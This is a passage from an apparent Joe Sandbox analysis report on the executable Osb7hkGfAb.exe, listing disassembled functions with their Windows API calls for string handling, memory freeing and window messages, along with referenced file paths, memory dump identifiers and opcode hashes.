                                                                  • Associated: 00000000.00000002.2637655464.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637815169.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                                  • API String ID: 3248276644-297319885
                                                                  • Opcode ID: e638d3577084fc0f37fd401aa5ef1a5930802456fef8e272e5ea6ea3ca1dc2da
                                                                  • Instruction ID: a7953992a1868a2a025aeaadbe30fe94b9837340da5d1ec43b16535858986a89
                                                                  • Opcode Fuzzy Hash: e638d3577084fc0f37fd401aa5ef1a5930802456fef8e272e5ea6ea3ca1dc2da
                                                                  • Instruction Fuzzy Hash: 6DF02821105E6116D222323A1C05AAF3A74CE82364715013FF862B22D3CF7CB9139DBE
                                                                  Function 00405192 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • IsWindowVisible.USER32(?), ref: 004051C1
                                                                  • CallWindowProcA.USER32(?,?,?,?), ref: 00405212
                                                                    • Part of subcall function 004041C7: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 004041D9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2637585543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637631224.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637815169.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: Window$CallMessageProcSendVisible
                                                                  • String ID:
                                                                  • API String ID: 3748168415-3916222277
                                                                  • Opcode ID: 9af3a59599e8879c459ffb9579ce68eec3d4baecce8abe749bc9c6a9b619fe8d
                                                                  • Instruction ID: 7056b910bbb205cd539ea3acc8ab51e06e0639846daa80cdaddfd33d10a348e5
                                                                  • Opcode Fuzzy Hash: 9af3a59599e8879c459ffb9579ce68eec3d4baecce8abe749bc9c6a9b619fe8d
                                                                  • Instruction Fuzzy Hash: 47017171200609ABEF20AF11DD80A5B3666EB84354F14413AFB107A1D1C77A8C62DE6E
                                                                  Function 00403875 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • FreeLibrary.KERNEL32(?,76F93410,00000000,C:\Users\user\AppData\Local\Temp\,0040384D,00403667,?,?,00000007,00000009,0000000B), ref: 0040388F
                                                                  • GlobalFree.KERNEL32(0073A1F0), ref: 00403896
                                                                  Strings
                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00403875
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2637585543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637631224.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637815169.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: Free$GlobalLibrary
                                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                                  • API String ID: 1100898210-297319885
                                                                  • Opcode ID: 7191d99a6f9acf46369f1b571abb68d71f554d24c115b495d4645827db6beddd
                                                                  • Instruction ID: eaa0fdc8f68cdeff62b7926931e70464fa678e679eb7ff43971a821d65c68845
                                                                  • Opcode Fuzzy Hash: 7191d99a6f9acf46369f1b571abb68d71f554d24c115b495d4645827db6beddd
                                                                  • Instruction Fuzzy Hash: 20E08C335110205BC7613F54EA0471A77ECAF59B62F4A017EF8847B26087781C464A88
                                                                  Function 00405AD6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402F0D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Osb7hkGfAb.exe,C:\Users\user\Desktop\Osb7hkGfAb.exe,80000000,00000003), ref: 00405ADC
                                                                  • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F0D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Osb7hkGfAb.exe,C:\Users\user\Desktop\Osb7hkGfAb.exe,80000000,00000003), ref: 00405AEA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2637585543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637631224.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637815169.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: CharPrevlstrlen
                                                                  • String ID: C:\Users\user\Desktop
                                                                  • API String ID: 2709904686-2743851969
                                                                  • Opcode ID: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
                                                                  • Instruction ID: fbea36dfa466fa1ea2516b65251d52c814037185d06ce8b70eff5ee1363e4df1
                                                                  • Opcode Fuzzy Hash: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
                                                                  • Instruction Fuzzy Hash: 73D0A7B25089706EFB0352509C00B8F6E88CF17300F0A04A3E080A7191C7B84C424BFD
                                                                  Function 6FF810E0 Relevance: 5.1, APIs: 4, Instructions: 102memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 6FF8115B
                                                                  • GlobalFree.KERNEL32(00000000), ref: 6FF811B4
                                                                  • GlobalFree.KERNEL32(?), ref: 6FF811C7
                                                                  • GlobalFree.KERNEL32(?), ref: 6FF811F5
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2668548574.000000006FF81000.00000020.00000001.01000000.00000005.sdmp, Offset: 6FF80000, based on PE: true
                                                                  • Associated: 00000000.00000002.2666689682.000000006FF80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2668568921.000000006FF83000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2668596503.000000006FF85000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6ff80000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: Global$Free$Alloc
                                                                  • String ID:
                                                                  • API String ID: 1780285237-0
                                                                  • Opcode ID: 72a54c6be233ea165eaa68b913117ccb89302b11a5902624c6b6389c463a02d0
                                                                  • Instruction ID: f8f0a705009566cb18456e1306370d1e33941b54a7af7cb534024920347fd037
                                                                  • Opcode Fuzzy Hash: 72a54c6be233ea165eaa68b913117ccb89302b11a5902624c6b6389c463a02d0
                                                                  • Instruction Fuzzy Hash: 4D316FB1514A44AFEF118FA8D949B767FFCFB07364B144716E875C6360DB3498108B21
                                                                  Function 00405BF5 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C05
                                                                  • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405C1D
                                                                  • CharNextA.USER32(00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C2E
                                                                  • lstrlenA.KERNEL32(00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C37
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2637585543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637631224.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637815169.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                                  • String ID:
                                                                  • API String ID: 190613189-0
                                                                  • Opcode ID: b2794e6bf21c90d62e2ecb38362cfad12420dfe545fda3f665c5114a80d4c16b
                                                                  • Instruction ID: 0c44f0240925c5b75b39479a83fd13515cb2c3d3321eb5bdfbc953cb3faf5d46
                                                                  • Opcode Fuzzy Hash: b2794e6bf21c90d62e2ecb38362cfad12420dfe545fda3f665c5114a80d4c16b
                                                                  • Instruction Fuzzy Hash: FBF0F631105A18FFDB12DFA4CD00D9EBBA8EF55350B2540B9E840F7210D634DE01AFA8